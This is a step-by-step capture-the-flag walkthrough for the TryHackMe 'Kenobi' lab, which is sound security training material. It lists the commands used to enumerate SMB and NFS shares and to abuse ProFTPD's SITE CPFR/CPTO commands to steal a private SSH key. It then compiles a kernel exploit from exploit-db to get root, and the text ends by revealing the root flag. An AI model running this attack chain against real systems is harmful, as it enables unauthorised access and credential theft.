Room Link : https://tryhackme.com/r/room/kenobi STEP1 nmap 10.10.170.101 FINDING 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 111/tcp open rpcbind 2-4 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 2049/tcp open nfs 2-4 (RPC #100003) 35285/tcp open mountd 1-3 (RPC #100005) 39595/tcp open mountd 1-3 (RPC #100005) 46411/tcp open nlockmgr 1-4 (RPC #100021) 47473/tcp open mountd 1-3 (RPC #100005) Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ----------------------------------------------------------------------------------------------------- STEP2 smbclient -L \\\\10.10.170.101\\ -- blank password FINDING Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu)) ----------------------------------------------------------------------------------------------------- STEP3 smbclient //10.10.170.101/anonymous -- blank password dir FINDING log.txt N 12237 Wed Sep 4 06:49:09 2019 ----------------------------------------------------------------------------------------------------- STEP4 mget log.txt -- to download the file FINDING Generating public/private rsa key pair. Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): Created directory /home/kenobi/.ssh. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/kenobi/.ssh/id_rsa. Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub. ----------------------------------------------------------------------------------------------------- STEP5 showmount -e 10.10.170.101 -- cause due to nfs share mount folder as 111/tcp open rpcbind 2-4 (RPC #100000) 2049/tcp open nfs 2-4 (RPC #100003) FINDING /var * ----------------------------------------------------------------------------------------------------- STEP6 mkdir /tmp/mount mount -o rw,vers=3 10.10.170.101:/var /tmp/mount ----------------------------------------------------------------------------------------------------- STEP7 we need to copy id-rsa FROM /home/kenobi/.ssh/id_rsa TO /var/tmp/ -- cause due to nfs share mount folder as 111/tcp open rpcbind 2-4 (RPC #100000) 2049/tcp open nfs 2-4 (RPC #100003) are open and ir_rsa path is given in log.txt /home/kenobi/.ssh/id_rsa ----------------------------------------------------------------------------------------------------- STEP8 nc 10.10.170.101 21 SITE CPFR /home/kenobi/.ssh/id_rsa SITE CPTO /var/tmp/id_rsa -- to the mounted filder FINDING 250 Copy successful ----------------------------------------------------------------------------------------------------- STEP9 cd /tmp/mount ls -la cd tmp ls -la cp id_rsa /root/Desktop/id_rsa chmod 600 id_rsa cd /root/Desktop ----------------------------------------------------------------------------------------------------- STEP10 ssh [email protected] -i id_rsa cd /tmp uname -r FINDING 4.8.0-58-generic https://www.exploit-db.com/exploits/45010 ----------------------------------------------------------------------------------------------------- STEP11 vim 45010 -- copy the exploit code this file and save it ----------------------------------------------------------------------------------------------------- STEP12 cp 45010 45010.c gcc 45010.c -o exploit.c -pthread chmod +x exploit.c ./exploit.c whoami root cd /root ls cat root.txt 177b3cd8562289f37382721c28381f02 -----------------------------------------------------------------------------------------------------